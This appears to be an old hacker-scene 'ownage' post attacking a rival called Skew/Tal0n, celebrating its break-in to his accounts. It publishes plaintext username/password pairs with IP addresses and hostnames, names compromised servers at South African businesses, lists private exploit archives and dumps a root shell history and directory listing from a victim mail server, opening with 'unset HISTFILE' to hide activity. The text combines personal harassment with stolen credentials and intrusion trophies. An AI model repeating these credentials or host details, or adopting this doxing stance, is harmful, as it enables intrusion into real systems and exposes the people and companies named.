#!/usr/bin/skew_gets_owned
#dk/archives/submission
#by murz

Skew, or as some know him, Tal0n, has been pissing off the wrong people. He lies to his friends, hacks from his friends' boxes, codes shitty code, talks way too much shit about people he shouldn't.. is there any more reason not to own this kid.

Side note: if you have a shell on one of his boxes, rm yourself; skew has been trojaned more than my high school prom date.

------------------------------------------------------------------------------------------------------
Checklist:
[1] Find Proof Skew == Tal0n
[2] Get into his bhugc/darkminds group and steal warez.
[3] log his passwds
[4] log his shells
[5] get his docs
[6] make him hand over all his code to me.
[7] make him state a public apology on his site, #darpa, #phrack, #darknet
------------------------------------------------------------------------------------------------------

so let's get this shit started.

[1] PR00F

(01:50:11) omgseckz : tell me the truth.. are you really tal0n ?
(01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as my alter ego again plz

[2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ.

May 31 18:10:32
May 31 18:10:36 BlackHat UnderGround Community is a community of codes in the blackhat community that contribute code on a server that is shared with the other blackhats who have access to it. The community stays updated and more alive when people upload more and more private exploits, tools, shellcodes, and other non-public works of the community member.
May 31 18:10:39 Currently, we are just starting up and may have a server in a week or so. If you are interested in joining the community, the requirement is when the server is up and we are organized to upload ONE exploit written by yourself and we encourage the uploads to atleast once a month although not required.
May 31 18:10:43
May 31 18:11:56 akula talked to me about it today
May 31 18:12:05 i guess we better start on it
May 31 18:28:09 skew invite ppl you think would be interested in this in here
May 31 18:28:11 skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:15 skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:17 bb

Ok, looks like we're in. Here is their warez list:

====================================
14,888 priv8LEEEET.pl
25,354 openssl-too-open.tar.gz
5,969 m00-SPAm.zip
839,680 m00-deadbear3.tar.gz
12,300 557vnc.extra.c
37,787 dfnctsc-kaiten.c
7,868 imap4life.pl <-- only thing here coded by skew.. and he had a lot of help with that even.
54,092 m00-apache-priv8.tar.gz
8,516 priv8sambar.pl
806,450 m00-deadbear2.tar.gz
805,930 m00-deadbear.tar.gz
===================================

[3] LOG HIS PASSWORDS.

2to: 24.177.23.252 user: skew pass: 5ubiZ3r0 #skew skewtty.dyndns.org
pass_from: 212.202.49.153 user: skew pass: *jd4^52h*d2= #skew localhost

### skew rooted boxes ###
plet.compumail.co.za
knysna.compumail.co.za
umhlanga.compumail.co.za
lin02.compumail.co.za
histologic.no-ip.info
irenefw.irenecountrylodge.co.za
196.25.22.178

[4] LOG HIS SHELLS:

------------------------------------
skew @ plet: Here we learn Skew has mad eleet codes and can sshbrute like a bitch.
------------------------------------ login as: root root@196.15.249.204's password: [root@plet root]# unset HISTFILE [root@plet root]# history 1 dig mail.nfmc.org 2 mailconf 3 dig mail.nfmc.org.za 4 dig nfmc.org.za 5 dig nfmc.org.za mx 6 mailconf 7 exit 8 cd /home/ 9 adduser aawind_heather 10 passwd aawind_heather 11 mailconf 12 exit 13 passwd vepac_patcarson 14 exit 15 netconf 16 drakconnect 17 exit 18 cd /home/ 19 passwd aawind_heather 20 exit 21 cd /home/ 22 exit 23 ssh lin02.compumail.co.za 24 exit 25 cd /home/ 26 exit 27 mailconf 28 exit 29 mailconf 30 cd /home/ 31 cd motocomp 32 ll 33 userconf 34 ll 35 mailconf 36 ll /var/spool/mail/mclauren 37 passwd mclauren/ 38 passwd mclauren 39 ll /var/spool/mail/mclauren 40 exit 41 ll /var/spool/mail/mclauren 42 exit 43 ll /var/spool/mail/mclauren 44 exit 45 cd /var/spool/mail/ 46 exit 47 mailconf 48 exit 49 dig merchantsponsors.co.za 50 dig merchantsponsors.co.za mx 51 dig www.merchantsponsors.co.za 52 /etc/init.d/named restart 53 dig www.merchantsponsors.co.za 54 /etc/init.d/named restart 55 dig www.merchantsponsors.co.za 56 mailconf 57 ssh lin02 58 mailconf 59 exit 60 mailconf 61 cd /home/ 62 adduser lw_danielle 63 mailconf 64 passwd lw_danielle 65 exit 66 vi /etc/ntp/step-tickers 67 vi /etc/ntp.conf 68 /etc/init.d/ntpd restart 69 grep ntpd /var/log/messages 70 exit 71 dig webmail.alberton.gp.school.za 72 ping induna.saix.net 73 ssh 196.15.249.203 74 mailconf 75 ping exchange.alberton.gp.scholl.za 76 ping exchange.alberton.gp.school.za 77 exit 78 mailconf 79 ifconfig 80 exit 81 mailq 82 exit 83 mailconf 84 mailq 85 mailconf 86 exit 87 cd /etc/vmail/ 88 ll 89 exit 90 cd home 91 cd /home 92 ls 93 passwd 94 passwd lw_danielle 95 passwd lw_danielle\ 96 passwd lw_danielle 97 mailconf 98 ls 99 passwd lw_danielle 100 exit 101 mailconf 102 ssh lin02 103 exit 104 mailconf 105 ssh lin2 106 ssh lin02 107 mailconf 108 clear 109 cd /home/ 110 ls 111 cd frog 112 ll 113 cd .. 
114 mailconf 115 exit 116 dig neslife.co.za mx 117 dig neslife.co.za mx @196.15.249.201 118 dig neslife.co.za mx @196.15.249.203 119 dig nestlife.co.za mx @196.15.249.203 120 mailconf 121 cd /h0ome 122 cd /home 123 ls 124 ping www.google.com 125 exit 126 mailconf 127 passwd atn_natasha 128 passwd atn_marianne 129 exit 130 mailconf 131 adduser subaru_maria 132 passwd subaru_maria 133 exit 134 cd /var/log/mail 135 vi info 136 exit 137 passwd subaru_maria 138 mailconf 139 exit 140 mailconf 141 cd /var/spool/mail 142 ll aawind_zack 143 exit 144 ssh 196.15.249.201 145 exit 146 cd\ 147 cd / 148 cls 149 clear 150 mqueue 151 mailq 152 cat /var/log/mail/info | grep bsn-i.com 153 mailconf 154 ssh lin02 155 exit 156 cat /var/log/mail/info | grep vusi.sithole@nestlife.co.za 157 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za 158 clar 159 clear 160 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za 161 ssh lin02 162 exit 163 mailconf 164 exit 165 ssh lin02.lanlink.co.za 166 exit 167 mailconf 168 cd /home/ 169 ls 170 adduser cm_info 171 passwd cm_info 172 userdel cm_info 173 mail 174 ll 175 adduser catchcadmapping 176 passwd catchcadmapping 177 mailconf 178 exit 179 cd /var/named/ 180 ll 181 cd /etc/ 182 vi named.conf 183 exit 184 mailconf 185 exit 186 rndc reload 187 rndc reload cadmapping.co.za 188 vi /var/named/sec/cadmapping.co.za 189 exit 190 vi /etc/named.conf 191 rndc reload 192 vi /etc/named.conf 193 rndc reload 194 vi /etc/named.conf 195 rm /var/named/sec/mabula.co.za 196 rm /var/named/sec/lodge.mabula.co.za 197 rm /var/named/sec/holton.co.za 198 rm /var/named/sec/ehd.co.za 199 rndc reload 200 vi /etc/named.conf 201 rndc reloa 202 rndc reload 203 rndc reload taalgenoot.co.za 204 rndc taalgenoot.co.za reloa 205 rndc reload 206 rndc reload taalgenoot.co.za 207 vi /etc/named.conf 208 rndc reload taalgenoot.co.za 209 rndc reload 210 rndc reload taalgenoot.co.za 211 tail /var/log/messages 212 vi /etc/named.conf 213 rndc reload taalgenoot.co.za 
214 rndc reload 215 rndc reload taalgenoot.co.za 216 exit 217 wshaper status 218 whereis wshaper 219 vi /usr/sbin/wshaper 220 wshaper 221 whereis wshaper 222 wshaper status 223 vi /usr/sbin/wshaper 224 wshaper stop 225 wshaper 226 wshaper status 227 cd /etc/init.d/ 228 ll 229 cp named wshaper 230 vi wshaper 231 rm wshaper 232 bwm 233 wshaper status 234 exit 235 mailconf 236 reboot 237 exit 238 cd /var/spool/mail/ 239 mailconf 240 exit 241 passwd msp_info 242 exit 243 ssh lin02.lanlink.co.za 244 exit 245 ssh lin02.lanlink.co.za 246 exit 247 vi /etc/vmail/aliases.frogav.co.za 248 exit 249 cat /var/log/mail/info | grep arcadia.no-ip.info 250 locate fetchmail 251 exit 252 vi /etc/named.conf 253 exit 254 ssh lin02.lanlink.co.za 255 exit 256 wshaper status 257 wshaper 258 netstat -an | grep :25 259 df -h 260 exit 261 /etc/init.d/sendmail restart 262 /etc/init.d/sendmail stop 263 /etc/init.d/sendmail start 264 ssh uvongo 265 exit 266 mailconf 267 dig www.khuphukani.co.za 268 dig www.khuphukani.co.za @196.15.249.203 269 userconf 270 mailconf 271 cd /home 272 ls 273 mailconf 274 adduser kh_info 275 adduser kh_sales 276 adduser kh_susanb 277 adduser kh_alessia 278 adduser kh_technical 279 passwd kh_info 280 passwd kh_sales 281 passwd kh_susanb 282 passwd kh_alessia 283 passwd kh_technical 284 mailconf 285 cd /var/spool/mail/ 286 ls 287 ls kh_ -s 288 ls -s 289 exit 290 df -h 291 /etc/init.d/sendmail stop 292 pf -ef | grep sendmail 293 ps 294 psps -ef | grep sendmail 295 ps -ef | grep sendmail 296 /etc/init.d/sendmail start 297 tail -f /var/log/mail/info 298 mailconf 299 vi /var/lib/mailertable 300 cd /etc/vmail/ 301 ll aliases.alltransportneeds.co.za 302 vi /var/lib/mailertable 303 vi aliases.alltransportneeds.co.za 304 mailconf 305 ll *atn* 306 ll 307 mailconf 308 cd /var/named/sec/ 309 ll 310 mailconf 311 dig atn.co.za mx 312 dig atn.co.za ns 313 dig alltransportneeds.co.za ns 314 wshaper status 315 exit 316 ifconfig 317 exit 318 telnet 127.0.0.1 110 319 telnet 127.0.0.1 25 
320 exit 321 dig pop.khupukano.co.za 322 mailconf 323 passwd hk_info 324 passwd kh_info 325 passwd kh_technical 326 passwd kh_alissia 327 cd /home 328 passwd kh_alessia 329 passwd kh_sales 330 passwd kh_susanb 331 passwd kh_technical 332 dig pop.khuphukani.co.za 333 /etc/init.d/named resatrt 334 /etc/init.d/named restart 335 dig pop.khuphukani.co.za 336 exit 337 cd /home 338 ls 339 passwd kh_technical 340 exit 341 clear 342 mailconf 343 adduser patm_kzn 344 passwd patm_kzn 345 adduser patm_wc 346 passwd patm_wc 347 adduser patm_er 348 passwd patm_er 349 passwd patm_nr 350 adduser patm_nr 351 passwd patm_nr 352 mailconf 353 exit 354 dig ub.co.zamx 355 dig ub.co.za mx 356 mailconf 357 exit 358 cd / 359 cd /etc/vmail/ 360 cat aliases.delvenco.co.za 361 mailconf 362 cd /var/spool/mail/ 363 ll catchdelvenco 364 ll -h catchdelvenco 365 ll -m catchdelvenco 366 ll catchdelvenco 367 exit 368 mailconf 369 exit 370 adduser catchibe 371 mailconf 372 adduser ibe_sandyb 373 adduser ibe_roadmech 374 adduser ibe_ibe 375 adduser ibe_tarbaby 376 passwd ibe_sandyb 377 passwd ibe_roadmech 378 passwd ibe_tarbaby 379 passwd ibe_ibe 380 ssh knysna.compumail.co.za 381 exit 382 mailq 383 exit 384 tail -f /var/log/mail/info | grep hotmail.com 385 exity 386 exit 387 tail -f /var/log/mail/info | grep italpizza.co.za 388 passwd emp-judy 389 tail -f /var/log/mail/info | grep italpizza.co.za 390 ssh lin02 391 mailconf 392 exit 393 mailconf 394 l /var/spool/mail/ibe_ibe 395 ll /var/spool/mail/ibe_ibe 396 tail -f /var/log/mail/info | grep ibe.co.za 397 ll /var/spool/mail/ibe_ibe 398 tail -f /var/log/mail/info | grep ibe.co.za 399 exit 400 clear 401 mailconf 402 /etc/init.d/sendmail restart 403 exit 404 vi /etc/vmail/aliases.falstaff.co.za 405 mailconf 406 cd /etc/ 407 vi named.conf 408 dig mx delvenco.co.za 409 exit 410 cd /var/spool/mail/ 411 grep no-ip.info * 412 ll ber* 413 cd /etc/vmail/ 414 cat aliases.delvenco.co.za 415 cat aliases.alltransportneeds.co.za 416 mailconf 417 cat 
aliases.onestar.co.za 418 mailconf 419 cd / 420 exit 421 mailconf 422 cd /etc/vmail/ 423 mailconf 424 /etc/init.d/sendmail stop 425 /etc/init.d/sendmail start 426 vi /root/.fetchmailrc 427 passwd catchonestar 428 cd /var/lib/ 429 ll 430 vi mailertable 431 passwd catchdelvenco 432 ll /var/spool/mail/catchliber* 433 cd /var/spool/mail/ 434 ll *liber* 435 exit 436 cd /home/ 437 mailconf 438 clear 439 sendmail restart 440 /etc/init.d/sendmail restart 441 exit 442 mailconf 443 ssh lin02 444 exit 445 ssh 196.25.45.234 446 exit 447 autopasswd 448 autopasswd --help 449 autopasswd -S joe 450 whereis autopassword 451 whereis autopasswrd 452 whereis autopasswd 453 file /usr/bin/autopasswd 454 vi /usr/bin/autopasswd 455 cd /home/joe/ 456 ll 457 genpassHex -? 458 genpassHex password 459 man genpassHex 460 whereis genpassHex 461 more /usr/bin/genpassHex 462 exit 463 vi /etc/named.conf 464 33 465 ll 466 cd /var/named/sec/ 467 rll 468 ll 469 ll pak* 470 exit 471 ssh parktonian.n0-ip.info 472 ssh parktonian.no-ip.info 473 ssh parktonian.n0-ip.infoparktonian.n0-ip.info 474 ssh 165.165.80.124 475 ssh 165.165.80.1 476 ssh 165.165.85.80 477 ssh parktonian.no-ip.info 478 ping parktonian.no-ip.info 479 ssh parktonian.no-ip.info 480 ssh 165.165.85.80 481 ssh parktonian.no-ip.info 482 exity 483 exit 484 mailconf 485 adduser tisc_derek.house 486 passwd tisc_derek.house 487 userdel tisc_tisc_derek.house -r 488 userdel tisc_tisc.derek.house -r 489 userdel tisc_derek.house -r 490 useradd tisc_d.house -r 491 useradd tisc_d.house 492 mailconf 493 cd /home 494 ls 495 userdel tisc_d.house 496 useradd tisc_d.house 497 passwd tisc_d.house 498 cd /var/named/ 499 ls 500 malconf 501 mailconf 502 dig mail.tiscpty.com 503 ifconfig 504 passwd tisc_d.house 505 dig webmail.tiscpty.com 506 dig webmail.tiscpty.com mx 507 cd home 508 cd /home 509 ls 510 passwd tisc_d.house 511 /etc/init.d/sendmail restart 512 [root@plet home]# ls tisc 513 userdel tisc_d.house 514 useradd d.house 515 passwd house 516 passwd 
d.house 517 mailconf 518 dig mail.tiscpty.com 519 dig tiscpty.com mx 520 dig tiscpty.com mx @192.168.20.2 521 mailconf 522 dig tiscpty.com x 523 dig tiscpty.com mx 524 dig tiscpty.com mx @196.25.1.1 525 dig tiscpty.com mx @induna.saix.net 526 userdel d.house -r 527 ls 528 exit 529 mailconf 530 passwd emp-judy 531 exit 532 mailconf 533 exit 534 cd home 535 cd / 536 ls 537 cd home 538 ls 539 exit 540 mailconf 541 ifconfig 542 mailconf 543 /etc/sen 544 cd /etc/init.d/sendmail status 545 cd /etc/init.d/sendmail stop 546 /etc/init.d/sendmail status 547 /etc/init.d/sendmail status stop 548 /etc/init.d/sendmail stop 549 /etc/init.d/sendmail start 550 /etc/init.d/sendmail restart 551 cd /var/spool/mail/ 552 ls tisc_d.house 553 rm tisc_d.house 554 ls tisc_d.house 555 ls mailconf 556 mailconf 557 ls tisc_d.house 558 exit 559 mailconf 560 mailconf\ 561 mailconf 562 ifconfig 563 exit 564 tail -f errors | grep tiscpty.comtail -f errors | grep tiscpty.com 565 cd /var/log 566 cd mail 567 ls 568 tail -f info | grep tiscpty 569 570 tail -f info | grep tiscpty 571 exit 572 mailconf 573 /etc/init.d/sendmail restart 574 cd /var/log 575 ls 576 vi mail 577 cd mail 578 ls 579 vi errors 580 ls 581 vi info 582 ls 583 tail -f errors | grep tiscpty.com 584 mailconf 585 exit 586 cd /home/ 587 mailconf 588 adduser subaru_parts 589 passwd subaru_parts 590 exit 591 wshaper start 592 mailq 593 mailstat 594 deldefermail 595 mailq 596 whereis deldefermail 597 vi /usr/sbin/de;def 598 vi /usr/sbin/deldefermail 599 delqueue 600 mailq 601 whereis delqeue 602 whereis delqueue 603 vi /usr/sbin/delqueue 604 mailq 605 vi /usr/sbin/delqueue 606 sendmail -? 
607 man sendmail 608 whereis sendmailspool 609 vi /usr/sbin/sendmailspool 610 exit 611 fsav -v 612 fsav --version 613 df -h 614 exit 615 dig kirk.co.za mx 616 mailconf 617 /etc/init.d/postfix restart 618 /etc/init.d/sendmail restart 619 exit 620 cd /etc/ma 621 cd /etc/mail 622 ll 623 vi relay_allow 624 vi virtusertable 625 vi name_allow 626 ll 627 cat access 628 /etc/init.d/xinetd restart 629 /etc/init.d/network restart 630 /etc/init.d/sendmail stop 631 /etc/init.d/sendmail start 632 wshaper status 633 tail -f /var/log/mail/info 634 chkconfig --list 635 cd /var/spool/ 636 cd mail/ 637 ll kirk_* 638 ll -h kirk_* 639 ll -m kirk_* 640 rm -rf kirk_fallback 641 mailconf 642 /etc/init.d/sendmail stop 643 /etc/init.d/sendmail start 644 pwd 645 ll -h 646 ll -? 647 ll 648 ll -H 649 ls -h 650 ls -H 651 ls -lah 652 man ll 653 ll kirk_* 654 df -h 655 ll 656 ll | more 657 rm ll_joe 658 ll | more 659 mailconf 660 /etc/init.d/sendmail stop 661 /etc/init.d/sendmail start 662 grep zacron passwd 663 grep zacron /etc/passwd 664 userdel -r catchzacron 665 userdel -r zacron_events 666 userdel -r zacron_zach 667 userdel -r zacron_zie 668 mail 669 df -h 670 ll 671 ll | more 672 rm -f BOGUS.alanna.* 673 ll | more 674 rm -f ssmark 675 exit 676 tcpdump -ni eth0 src 165.146.147.111 677 ping 165.146.147.111 678 tcpdump -ni eth0 src 165.146.147.111 679 tcpdump -ni eth0 src 165.146.100.119 680 netstat -an | grep 165.146.100.119 681 netstat -an | more 682 netstat -an 683 df -h 684 /etc/init.d/network restart 685 /etc/init.d/xinetd restart 686 locate netstat 687 tail -f /var/log/mail/info 688 tail -f /var/log/mail/info | grep 165.146.100.119 689 grep 165.146.100.119 /var/log/mail/info 690 tail -f /var/log/mail/info | grep 165.146.100.119 691 wshaper status 692 wshaper stop 693 tail -f /var/log/mail/info | grep 165.146.100.119 694 tail -f /var/log/mail/info 695 tail -f /var/log/mail/info | grep ipop3d 696 top 697 tail -f warnings | grep kirk 698 cd /var/log 699 tail -f warnings | grep kirk 700 cd 
/mail 701 cd mail 702 tail -f warnings | grep kirk 703 exit 704 cd /var/log 705 ls 706 tail -f messages | grep kirk 707 ifconfig 708 tail -f messages | grep kirk 709 mailconf 710 exit 711 cd /var/log 712 ls 713 cd mail 714 ls 715 tail -f errors | grep kirk 716 mailconf 717 exit 718 cd /var/log 719 ls 720 cd mail 721 ls 722 vi errors 723 vi info 724 mailconf 725 tail -f info | grep kirk 726 exit 727 ssh 196.15.249.201 728 exit 729 cd /var/named/ 730 ls 731 cd sec/ 732 ll 733 cp r-r-m.co.za ratana.co.za 734 vi r-r-m.co.za 735 vi ratana.co.za 736 exit 737 date 738 ssh 196.15.249.203 739 exit 740 ssh 196.15.249.203 741 date 742 exit 743 tail -f /var/log/mail/info | grep ub_saul@compumail.co.za 744 exit 745 cd /home 746 ls 747 mailconf 748 exit 749 cd /var/named/ 750 ls 751 cd sec/ 752 ls 753 cp ratana.co.za iphiko.co.za 754 vi iphiko.co.za 755 exit 756 /etc/init.d/named restart 757 vi /var/log/messages 758 clear 759 tail -f /var/log/messages 760 exit 761 cd /var/log/mail/ 762 grep deebar.co.za info 763 exit 764 wshaper statuis 765 wshaper status 766 wshaper stop 767 wshaper 768 wshaper status 769 exit 770 top 771 cd /proc/ 772 ll 773 ll filesystems 774 cat filesystems 775 ll fs 776 ll ide/ 777 ll 778 cat sys/fs/file-max 779 cat sys/fs/inode- 780 cat sys/fs/inode-nr 781 cat sys/fs/inode-state 782 cat sys/kernel/sysrq 783 cat sys/vm/bdflush 784 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush 785 ulimit 786 ulimit -? 787 ulimit -u 2048 788 mem 789 free 790 free -? 
791 top 792 ps -ef 793 cd /etc/rc.d/ 794 vi rc.local 795 echo 8192 > /proc/sys/fs/file-max 796 echo 8192 > /proc/sys/fs/inode-max 797 echo 1 > /proc/sys/kernel/sysrq 798 echo 6 > /proc/sys/net/ipv4/tcp_syn_retries 799 echo 90 > /proc/sys/net/ipv4/tcp_fin_timeout 800 echo 0 > /proc/sys/net/ipv4/tcp_timestamps 801 ulimit -u 2048 802 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush 803 /usr/local/sbin/mii-diag -A 100baseTx-FD eth1 804 /usr/local/sbin/mii-diag -A 100baseTx-FD eth0 805 /usr/local/sbin/mii-diag -F 100baseTx-FD eth1 806 vi rc.local 807 exit 808 mailconf 809 ll /var/spool/mail/atn_mark 810 ll /var/spool/mail/atn_barney 811 tail -f /var/log/mail/info | grep @alltransportneeds.co.za 812 ll /var/spool/mail/atn_barney 813 ll /var/spool/mail/atn_mark 814 tail -f /var/log/mail/info | grep @alltransportneeds.co.za 815 cat /var/log/mail/info | grep @alltransportneeds.co.za 816 vi mailconf 817 mailconf 818 tail -f /var/log/mail/info | grep @atn.co.za 819 cat /var/log/mail/info | grep @alltransportneeds.co.za 820 exit 821 ifconfig 822 mailconf 823 adduser ratan_gavin 824 userdel ratan_gavin /r 825 userdel ratan_gavin -rt 826 userdel ratan_gavin -r 827 adduser ratana_gavin 828 passwd ratana_gavin 829 exit 830 mailconf 831 adduser ratana_bianca 832 adduser ratana_brian 833 adduser ratana_aub 834 adduser ratana_ntabiseng 835 passwd ratana_bianca 836 passwd ratana_brian 837 passwd ratana_aubrey 838 passwd ratana_ntabiseng 839 cat /var/log/messages 840 ssh knysna.compumail.co.za 841 exit 842 mailq 843 /etc/init.d/sendmail stop 844 man sendmail 845 cd /var/spool/mqueue/ 846 ll 847 rm -f * 848 /etc/init.d/sendmail start 849 ll 850 mailq 851 exit 852 ssh 196.34.39.26 853 mailq 854 exit 855 reboot 856 exit 857 ping sodwana 858 exit 859 cd /etc/vmail/ 860 ll aliases.alltransportneeds.co.za 861 exit 862 ssh hitek.no-ip.info 863 mail 864 ping hitek.no-ip.info 865 drakconf 866 cat /var/lib/mailertable 867 cat /var/lib/mailertable | grep logisticor 868 exit 869 
locate wshap 870 vi /usr/sbin/wshaper 871 exit 872 mailconf 873 ssh 196.15.249.201 874 ssh 196.25.45.246 875 ssh andre@196.25.45.246 876 exit 877 ssh umglanga.compumail.co.za 878 exit 879 ssh lin02 880 ssh 196.25.45.254 881 exit 882 dig mail.tiscali.co.za 883 exit 884 df -h 885 ll 886 cd / 887 locate iso 888 locate iso | more 889 890 ssh 196.15.249.207 891 exit 892 mailconf 893 exit 894 ssh lin02.lanlink.co.za 895 exit 896 mail mark@mentorfreight.co.za 897 exit 898 mailconf 899 cd /var/spool/mail/ 900 ll mentor 901 cat mentor 902 mailconf 903 cat catchmf 904 ll catchmft 905 ll catchmtf 906 passwd catchmtf 907 exit 908 tail -f /var/log/mail/info | grep hi-tek.co.za 909 exit 910 mailconf 911 tail -f /var/log/mail/info | grep catchhitek 912 exit 913 vi /var/lib/mailertable 914 exit 915 mailconf 916 cd /home/ 917 adduser catchhitek 918 passwd catchhitek 919 mailconf 920 ll /var/spool/mail/catchhitek 921 mailconf 922 ll /var/spool/mail/catchhitek 923 tail -f /var/log/mail/info | grep logisticor.com 924 ssh mail.logisticor.com 925 telnet mail.logisticor.com 25 926 ssh mail.logisticor.com 927 ssh joe@mail.logisticor.com 928 telnet mail.logisticor.com 25 929 exit 930 clear 931 tail -f /var/log/mail/info | grep hi-tek.co.za 932 tail -f /var/log/mail/info | grep wynand 933 ssh lin02.compumail.co.za 934 ping lin02.compumail.co.za 935 ssh lin02.compumail.co.za 936 ping lin02.compumail.co.za 937 ssh lin02.compumail.co.za 938 mailconf 939 ssh lin02.compumail.co.za 940 telnet mail.logisticor.com 25 941 ssh lin02.compumail.co.za 942 exit 943 cat /var/log/mail/info | grep histologic.co.za 944 mailconf 945 cat /var/log/mail/info | grep catchhisto 946 tail -f /var/log/mail/info | grep catchhisto 947 tail -f /var/log/messages 948 tail -f /var/log/mail/info | grep catchhisto 949 exit 950 tail -f /var/log/mail/info | grep histologic.co.za 951 ll /var/spool/mail/catchhisto 952 exit 953 ll /var/spool/mail/catchhisto 954 exit 955 mailconf 956 ssh lin02.lanlink.co.za 957 exit 958 mailconf 
959 tail -f /var/log/mail/info | grep histologic.co.za 960 ll /var/spool/mail/catchhisto 961 tail -f /var/log/mail/info 962 tail -f /var/log/mail/info | grep catchhisto 963 exit 964 ssh histologic.no-ip.info 965 exit 966 cat /etc/vmail/aliases.subaru-pretoria.co.za 967 adduser subaru_marelie 968 vi /etc/shadow 969 vi /etc/vmail/aliases.subaru-pretoria.co.za 970 vi /etc/shadow 971 exit 972 ssh knysna.compumail.co.za 973 tail -f /var/log/mail/info | grep 165.146.101.31 974 mailconf 975 dig frogav.co.za mx 976 dig frogav.co.za mx @196.43.1.14 977 mailconf 978 exit 979 mailconf 980 ssh lin02.compumail.co.za 981 adduser htgina 982 passwd htgina 983 mailconf 984 exit 985 w 986 login root 987 logout 988 exit 989 w 990 logout 991 unset HISTFILE 992 history [root@plet root]# ls -la total 297498 drwx------ 34 root root 3688 Jun 9 11:45 ./ drwxr-xr-x 21 root adm 880 May 30 08:20 ../ lrwxrwxrwx 1 root root 41 Feb 27 2003 .DCOPserver_plet.compumail.co.za_:0 -> /root/.DCOPserver_plet.compumail.co.za__0 -rw-r--r-- 1 root root 67 Mar 13 2003 .DCOPserver_plet.compumail.co.za__0 -rw------- 1 root root 434 Jun 12 2004 .ICEauthority -rw------- 1 root root 312 May 8 16:06 .Xauthority -rw-r--r-- 1 root root 1479 Feb 16 2002 .Xdefaults -rw------- 1 root root 15889 Jun 14 01:21 .bash_history -rw-r--r-- 1 root root 24 Feb 16 2002 .bash_logout -rw-r--r-- 1 root root 106 Feb 16 2002 .bash_profile -rw-r--r-- 1 root root 226 Feb 16 2002 .bashrc drwx------ 2 root root 72 Oct 20 2003 .cedit/ drwxr-xr-x 3 root root 96 Sep 3 2003 .cpan/ -rw-r--r-- 1 root root 233 Feb 16 2002 .cshrc -rw-r--r-- 1 root root 14 Feb 9 2003 .desktop -rw------- 1 root root 222 Feb 9 2003 .draksync -rwx--x--- 1 root root 538 Mar 30 2004 .fetchmailrc* drwx------ 4 root root 128 Mar 13 2003 .gconf/ drwx------ 2 root root 80 Mar 13 2003 .gconfd/ drwxr-xr-x 2 root root 72 Feb 9 2003 .gnome/ drwx------ 3 root root 96 Mar 13 2003 .gnome2/ drwx------ 2 root root 48 Mar 13 2003 .gnome2_private/ drw------- 2 root root 200 Nov 2 
2003 .gnupg/ -rw-r--r-- 1 root root 149 Feb 9 2003 .gtkrc -rw-r--r-- 1 root root 124 Feb 9 2003 .gtkrc-2.0 -rw-r--r-- 1 root root 1111 Feb 9 2003 .gtkrc-kde drwxr-xr-x 2 root root 112 Feb 9 2003 .icewm/ -rw-r--r-- 1 root root 160 Feb 9 2003 .info_perso drwx------ 2 root root 48 Jun 11 2004 .inspect_tmp_dir/ drwxr-xr-x 4 root root 192 Feb 8 2003 .kde/ drwxr-xr-x 3 root root 144 Jun 15 2004 .mc/ drwxr-xr-x 2 root root 80 Feb 8 2003 .mcop/ -rw------- 1 root root 31 Feb 9 2003 .mcoprc drwxr-xr-x 5 root root 144 Mar 13 2003 .mozilla/ drwxr-xr-x 2 root root 176 Feb 8 2003 .qt/ -rw-r--r-- 1 root root 135 Aug 31 2004 .rpmdrake drwx------ 2 root root 80 Sep 15 2003 .spamassassin/ drwx------ 2 root root 136 Nov 14 2004 .ssh/ -rw-r--r-- 1 root root 189 Feb 16 2002 .tcshrc -rw------- 1 root root 6112 Jun 9 11:45 .viminfo -rw------- 1 root root 0 Mar 24 2004 .viminfo.tmp -rw------- 1 root root 4096 Nov 26 2004 .viminfy.tmp -rw------- 1 root root 0 Mar 24 2004 .viminfz.tmp -rw-r--r-- 1 root root 3750 Feb 16 2002 .vimrc -rw-r--r-- 1 root root 6 Feb 9 2003 .wmrc -rw-r--r-- 1 root root 13396 Feb 8 2003 .xftcache -rw------- 1 root root 9860 Aug 20 2003 .xsession-errors -rwxr-xr-x 1 root root 3741018 Jun 14 2004 BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run* -rw-r--r-- 1 root root 2394 Sep 3 2004 Creport drwx------ 3 root root 152 Feb 9 2003 Desktop/ drwxr-xr-x 2 root root 48 Feb 9 2003 Documents/ drwx------ 7 root root 520 Jun 12 2004 Mail/ -rw-r--r-- 1 root root 2184 Sep 3 2004 Sreport -rw-r--r-- 1 root root 628757 Mar 12 2004 XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 1082040 Jun 15 2004 XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 848085 Jun 18 2004 XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz -rw-r--r-- 1 root root 1088878 Sep 3 2004 XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz -rw-r--r-- 1 root root 1090708 Sep 10 2004 XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz -rwxr-x--x 1 root root 513 Jan 4 16:14 aliases.frogav.co.za* 
drwxr-xr-x 2 root root 1080 Nov 24 2004 altermime-0.3.6/ -rw-r--r-- 1 root root 69604 Nov 24 2004 altermime-0.3.6.tar.gz drwxr-xr-x 8 joe joe 1096 Aug 31 2004 apg-2.2.3/ -rw-r--r-- 1 root root 49779 Aug 31 2004 apg-2.2.3-1mdk.i586.rpm -rw-r--r-- 1 root root 108186 Aug 31 2004 apg-2.2.3.tar.gz -rwxr-xr-x 1 root root 170 May 29 2003 cleanxmime* -rw------- 1 root root 61440 May 9 12:47 core.13099 -rw------- 1 root root 61440 May 9 12:47 core.13184 -rw------- 1 root root 61440 May 9 12:47 core.13191 -rw------- 1 root root 61440 Apr 8 08:16 core.18972 -rw-r--r-- 1 root root 497631 Oct 2 2003 csav-4.80.7-shared.i386.rpm -rw------- 1 root root 2270855 May 30 15:04 dead.letter -rw-r--r-- 1 root root 23200 Jan 21 2004 doc_linux.zip -rw-r--r-- 1 root root 1473 Mar 12 2004 domainlist drwx------ 2 root root 272 Feb 8 2003 drakx/ -rw-r--r-- 1 root root 164485 Jun 1 2004 fernando -rw-r--r-- 1 root root 416 Oct 21 2003 fetchmail.txt 